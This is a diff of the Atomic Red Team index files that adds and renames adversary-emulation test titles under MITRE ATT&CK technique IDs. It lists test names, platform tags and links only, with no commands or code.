 - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
  - Atomic Test #1: Process Discovery - ps [macos, linux]
@@ -2387,6 +2413,7 @@
  - Atomic Test #7: WinPwn - bluekeep [windows]
  - Atomic Test #8: WinPwn - fruit [windows]
  - Atomic Test #9: Network Service Discovery for Containers [containers]
+  - Atomic Test #10: Port-Scanning /24 Subnet with PowerShell [windows]
 - [T1518 Software Discovery](../../T1518/T1518.md)
  - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
  - Atomic Test #2: Applications Installed [windows]
@@ -2548,6 +2575,7 @@
  - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
  - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
  - Atomic Test #3: Overwrite deleted data on C drive [windows]
+  - Atomic Test #4: GCP - Delete Bucket [iaas:gcp]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1490 Inhibit System Recovery](../../T1490/T1490.md)
@@ -2560,6 +2588,7 @@
  - Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
  - Atomic Test #8: Windows - Disable the SR scheduled task [windows]
  - Atomic Test #9: Disable System Restore Through Registry [windows]
+  - Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
 - T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
  - Atomic Test #1: Shutdown System - Windows [windows]
@@ -2604,6 +2633,7 @@
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
+  - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
  - Atomic Test #1: Create local account with admin privileges [windows]
@@ -241,7 +241,9 @@
 - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
  - Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
 - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
+  - Atomic Test #4: Active Directory Create Admin Account [linux]
+  - Atomic Test #5: Active Directory Create User Account (Non-elevated) [linux]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -517,7 +519,7 @@
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552 Unsecured Credentials](../../T1552/T1552.md)
-  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
+  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
 - T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -564,7 +566,8 @@
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
+  - Atomic Test #23: Active Directory Domain Search [linux]
 - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
  - Atomic Test #1: Enumerate all accounts (Local) [linux]
  - Atomic Test #2: View sudoers access [linux, macos]
@@ -574,7 +577,8 @@
  - Atomic Test #6: Enumerate users and groups [linux, macos]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
  - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
+  - Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux]
 - [T1007 System Service Discovery](../../T1007/T1007.md)
  - Atomic Test #3: System Service Discovery - systemctl [linux]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
@@ -491,7 +491,8 @@
  - Atomic Test #7: MacOS Swift Keylogger [macos]
 - T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
+  - Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1555.001 Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md)
@@ -505,7 +506,7 @@
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552 Unsecured Credentials](../../T1552/T1552.md)
-  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
+  - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
 - T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -88,7 +88,7 @@

 # persistence
 - T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -103,7 +103,8 @@
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1098.002 Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md)
+  - Atomic Test #1: EXO - Full access mailbox permission granted to a user [office-365]
 - T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -71,8 +71,10 @@
  - Atomic Test #2: Create a Hidden User Called "$" [windows]
  - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
  - Atomic Test #4: Create and Hide a Service with sc.exe [windows]
+  - Atomic Test #5: Command Execution with NirCmd [windows]
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562.009 Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md)
+  - Atomic Test #1: Safe Mode Boot [windows]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
  - Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
  - Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
@@ -150,6 +152,7 @@
  - Atomic Test #10: Lolbin Gpscript logon option [windows]
  - Atomic Test #11: Lolbin Gpscript startup option [windows]
  - Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
+  - Atomic Test #13: LOLBAS CustomShellHost to Spawn Process [windows]
 - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
  - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
@@ -248,6 +251,7 @@
  - Atomic Test #54: Do Not Connect To Win Update [windows]
  - Atomic Test #55: Tamper Win Defender Protection [windows]
  - Atomic Test #56: Snake Malware Registry Blob [windows]
+  - Atomic Test #57: Allow Simultaneous Download Registry [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -388,6 +392,7 @@
  - Atomic Test #36: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
  - Atomic Test #37: Delete Windows Defender Scheduled Tasks [windows]
  - Atomic Test #43: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
+  - Atomic Test #44: AMSI Bypass - Override AMSI via COM [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -591,7 +596,8 @@
  - Atomic Test #3: Service Installation PowerShell [windows]
  - Atomic Test #4: TinyTurla backdoor service w64time [windows]
  - Atomic Test #5: Remote Service Installation CMD [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
+  - Atomic Test #1: Print Processors [windows]
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -617,7 +623,8 @@
  - Atomic Test #2: Create shortcut to cmd in startup folders [windows]
 - T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
-  - Atomic Test #1: Modify SSP configuration in registry [windows]
+  - Atomic Test #1: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry [windows]
+  - Atomic Test #2: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry [windows]
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
@@ -923,7 +930,8 @@
  - Atomic Test #5: Remote Service Installation CMD [windows]
 - [T1137 Office Application Startup](../../T1137/T1137.md)
  - Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
+  - Atomic Test #1: Print Processors [windows]
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -963,7 +971,8 @@
 - T1062 Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
-  - Atomic Test #1: Modify SSP configuration in registry [windows]
+  - Atomic Test #1: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry [windows]
+  - Atomic Test #2: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry [windows]
 - T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1131 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1108,7 +1117,7 @@
 - [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
  - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
  - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
  - Atomic Test #1: Logon Scripts [windows]
@@ -1165,6 +1174,7 @@
  - Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
  - Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
  - Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
+  - Atomic Test #4: run ngrok [windows]
 - T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1323,7 +1333,9 @@
 - T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1097 Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1570 Lateral Tool Transfer](../../T1570/T1570.md)
+  - Atomic Test #1: Exfiltration Over SMB over QUIC (New-SmbMapping) [windows]
+  - Atomic Test #2: Exfiltration Over SMB over QUIC (NET USE) [windows]
 - T1075 Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1563.002 Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md)
@@ -1616,6 +1628,7 @@
  - Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
  - Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
  - Atomic Test #25: System Information Discovery with WMIC [windows]
+  - Atomic Test #26: Driver Enumeration using DriverQuery [windows]
 - [T1010 Application Window Discovery](../../T1010/T1010.md)
  - Atomic Test #1: List Process Main Windows - C# .NET [windows]
 - T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1708,6 +1721,7 @@
  - Atomic Test #6: WinPwn - MS17-10 [windows]
  - Atomic Test #7: WinPwn - bluekeep [windows]
  - Atomic Test #8: WinPwn - fruit [windows]
+  - Atomic Test #10: Port-Scanning /24 Subnet with PowerShell [windows]
 - [T1518 Software Discovery](../../T1518/T1518.md)
  - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
  - Atomic Test #2: Applications Installed [windows]
@@ -1772,6 +1786,7 @@
  - Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
  - Atomic Test #8: Windows - Disable the SR scheduled task [windows]
  - Atomic Test #9: Disable System Restore Through Registry [windows]
+  - Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
 - T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
  - Atomic Test #1: Shutdown System - Windows [windows]
@@ -5,10 +5,10 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | 